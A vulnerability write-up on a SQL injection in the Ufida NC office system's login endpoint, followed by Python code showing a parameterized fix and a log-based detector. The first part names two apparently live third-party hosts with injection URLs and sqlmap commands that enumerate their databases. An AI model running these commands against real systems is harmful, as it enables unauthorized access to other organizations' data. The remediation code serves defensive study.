Ufida NC Integrated Office System front-end SQL injection vulnerability
The logon interface of the Ufida NC Integrated Office System has a SQL injection vulnerability. Because the NC platform shares its database back end, one injection point can reach the databases of several office systems at once (for example the HR Resource Management System and the UFO Reporting System).
Injection link: /epp/LoginServerDo.jsp?userid=1111&pwd=2222
Injection parameter: userid
Test cases:
(1) http://zfkg.com:8081/
Injection link: http://zfkg.com:8081/epp/LoginServerDo.jsp?userid=1'&pwd=1
SQLMAP injection:
python sqlmap.py -u 'http://zfkg.com:8081/epp/LoginServerDo.jsp?userid=1&pwd=1' -p userid --level 5 --risk 3 --dbms oracle --batch --random-agent --current-db -v 3
python sqlmap.py -u 'http://zfkg.com:8081/epp/LoginServerDo.jsp?userid=1&pwd=1' -p userid --level 5 --risk 3 --dbms oracle --batch --random-agent --dbs -v 3
(2) http://nc.xhlbdc.com
Injection link: http://nc.xhlbdc.com/epp/LoginServerDo.jsp?userid=1'&pwd=1
SQLMAP injection:
python sqlmap.py -u 'http://nc.xhlbdc.com/epp/LoginServerDo.jsp?userid=1&pwd=1' -p userid --level 5 --risk 3 --dbms oracle --batch --random-agent --current-db -v 3
Solution:
Filter the userid parameter (and any other user-supplied input) before it is used in the login query.
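The report's remedy is input filtering; the durable fix for a login lookup like LoginServerDo.jsp is to bind the userid and pwd values as parameters so a quote can never become SQL syntax. The following is an added illustration written for this page, not Ufida's code: it contrasts a concatenated query (which errors out on the report's userid=1' probe, the signal that confirms the bug) with a parameterized one, and adds a small access-log check that flags login requests whose userid carries SQL metacharacters. The table name sm_user, the log line format and the sqlite3 back end are assumptions for the demo; the real product runs on Oracle.

```python
import re
import sqlite3
from urllib.parse import unquote

def make_db():
    """Constructed in-memory stand-in for the NC user table (not the vendor's schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE sm_user (userid TEXT, pwd TEXT)")
    conn.execute("INSERT INTO sm_user VALUES ('1111', '2222')")
    return conn

def login_vulnerable(conn, userid, pwd):
    # String concatenation: the quote in userid is interpreted as SQL syntax.
    sql = "SELECT count(*) FROM sm_user WHERE userid = '%s' AND pwd = '%s'" % (userid, pwd)
    return conn.execute(sql).fetchone()[0] == 1

def login_safe(conn, userid, pwd):
    # Bound parameters: the driver sends userid as data, never as SQL text.
    sql = "SELECT count(*) FROM sm_user WHERE userid = ? AND pwd = ?"
    return conn.execute(sql, (userid, pwd)).fetchone()[0] == 1

def probe_result(login_fn, conn):
    """Run the report's userid=1' probe and classify what the back end did."""
    try:
        login_fn(conn, "1'", "1")
        return "handled"        # parameterized: treated as an unknown user
    except sqlite3.Error:
        return "sql error"      # concatenated: malformed query, the injection signal

LOGIN_PATH = re.compile(r"/epp/LoginServerDo\.jsp\?(\S*)")

def suspicious_login(request_line):
    """Flag a web-server log line whose login request carries SQL metacharacters in userid."""
    m = LOGIN_PATH.search(request_line)
    if not m:
        return False
    params = {}
    for part in m.group(1).split("&"):
        if "=" in part:
            key, value = part.split("=", 1)
            params[key.lower()] = unquote(value)
    userid = params.get("userid", "")
    return re.search(r"""['"();]|--|/\*""", userid) is not None
```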